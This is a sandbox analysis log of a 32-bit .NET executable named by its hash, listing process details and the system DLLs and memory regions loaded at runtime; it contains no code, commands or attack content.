# Flog Txt Version 1
# Analyzer Version: 4.6.0
# Analyzer Build Date: Jul 8 2022 06:26:21
# Log Creation Date: 05.08.2022 11:28:59.674
Process:
id = "1"
image_name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
page_root = "0x4573d000"
os_pid = "0xf60"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x77c"
cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\" "
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 110
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 111
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 112
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 113
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 114
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 115
start_va = 0x80000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 116
start_va = 0x1e0000
end_va = 0x21ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 117
start_va = 0x1370000
end_va = 0x1439fff
monitored = 1
entry_point = 0x1434c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 118
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 119
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 120
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 121
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 122
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 123
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 124
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 125
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 126
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 266
start_va = 0x220000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 267
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 268
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 269
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 270
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 271
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 272
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 273
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 274
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 275
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 276
start_va = 0x460000
end_va = 0x71ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 277
start_va = 0x73500000
end_va = 0x73549fff
monitored = 1
entry_point = 0x73502e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 278
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 279
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 280
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 281
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 282
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 283
start_va = 0x180000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 284
start_va = 0x220000
end_va = 0x286fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 285
start_va = 0x3e0000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 286
start_va = 0x290000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 287
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 288
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 289
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 290
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 291
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 292
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 293
start_va = 0x720000
end_va = 0x8fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 294
start_va = 0x733b0000
end_va = 0x7343cfff
monitored = 1
entry_point = 0x733c2860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 295
start_va = 0x734f0000
end_va = 0x734f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 296
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 297
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 298
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 299
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 300
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 301
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 302
start_va = 0x460000
end_va = 0x5e7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000460000"
filename = ""
Region:
id = 303
start_va = 0x620000
end_va = 0x71ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 304
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 305
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 306
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 307
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 308
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 309
start_va = 0x720000
end_va = 0x8a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000720000"
filename = ""
Region:
id = 310
start_va = 0x8f0000
end_va = 0x8fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 311
start_va = 0x1440000
end_va = 0x283ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001440000"
filename = ""
Region:
id = 312
start_va = 0x900000
end_va = 0x9c3fff
monitored = 1
entry_point = 0x9c4c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 313
start_va = 0x900000
end_va = 0x9c3fff
monitored = 1
entry_point = 0x9c4c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 314
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 315
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 316
start_va = 0x70fc0000
end_va = 0x7176efff
monitored = 1
entry_point = 0x70fdd0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 317
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 318
start_va = 0x73600000
end_va = 0x73613fff
monitored = 0
entry_point = 0x7360ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 319
start_va = 0x73550000
end_va = 0x735fafff
monitored = 0
entry_point = 0x735e5f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 320
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 321
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 322
start_va = 0x1d0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 323
start_va = 0x190000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 324
start_va = 0x1a0000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 325
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 326
start_va = 0x1c0000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 327
start_va = 0x290000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 328
start_va = 0x300000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 329
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 330
start_va = 0x2b0000
end_va = 0x2b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 331
start_va = 0x900000
end_va = 0xa1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 332
start_va = 0xa20000
end_va = 0xb4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 333
start_va = 0xa30000
end_va = 0xa6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a30000"
filename = ""
Region:
id = 334
start_va = 0xb10000
end_va = 0xb4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 335
start_va = 0xd00000
end_va = 0xdfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d00000"
filename = ""
Region:
id = 336
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 337
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 338
start_va = 0x2840000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 339
start_va = 0x340000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000340000"
filename = ""
Region:
id = 340
start_va = 0x930000
end_va = 0x96ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 341
start_va = 0x9e0000
end_va = 0xa1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 342
start_va = 0xb60000
end_va = 0xc5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b60000"
filename = ""
Region:
id = 343
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 344
start_va = 0xaa0000
end_va = 0xadffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000aa0000"
filename = ""
Region:
id = 345
start_va = 0xfd0000
end_va = 0x10cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fd0000"
filename = ""
Region:
id = 346
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 347
start_va = 0x4840000
end_va = 0x4b0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 348
start_va = 0x70360000
end_va = 0x7176afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 349
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 350
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 351
start_va = 0x10d0000
end_va = 0x12affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010d0000"
filename = ""
Region:
id = 352
start_va = 0xe00000
end_va = 0xedefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e00000"
filename = ""
Region:
id = 353
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 354
start_va = 0x74a20000
end_va = 0x74a22fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 355
start_va = 0x74990000
end_va = 0x74a18fff
monitored = 1
entry_point = 0x74991130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 356
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 357
start_va = 0x2d0000
end_va = 0x2dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 358
start_va = 0x6f900000
end_va = 0x70354fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 359
start_va = 0x6f750000
end_va = 0x6f8f2fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll")
Region:
id = 363
start_va = 0x6e8e0000
end_va = 0x6f745fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll")
Region:
id = 364
start_va = 0x6e330000
end_va = 0x6e8d3fff
monitored = 1
entry_point = 0x6e8bb692
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 365
start_va = 0x2e0000
end_va = 0x2e1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 366
start_va = 0x6e0c0000
end_va = 0x6e8d7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 367
start_va = 0x6dfb0000
end_va = 0x6e0b4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll")
Region:
id = 368
start_va = 0x2f0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 369
start_va = 0x6d830000
end_va = 0x6dfa3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 370
start_va = 0x74970000
end_va = 0x74982fff
monitored = 1
entry_point = 0x7497d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 371
start_va = 0x4b10000
end_va = 0x4de1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 372
start_va = 0x75be0000
end_va = 0x76829fff
monitored = 0
entry_point = 0x75c61601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 373
start_va = 0x5f0000
end_va = 0x5f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 374
start_va = 0x748d0000
end_va = 0x748dafff
monitored = 0
entry_point = 0x748d1992
region_type = mapped_file
name = "profapi.dll"
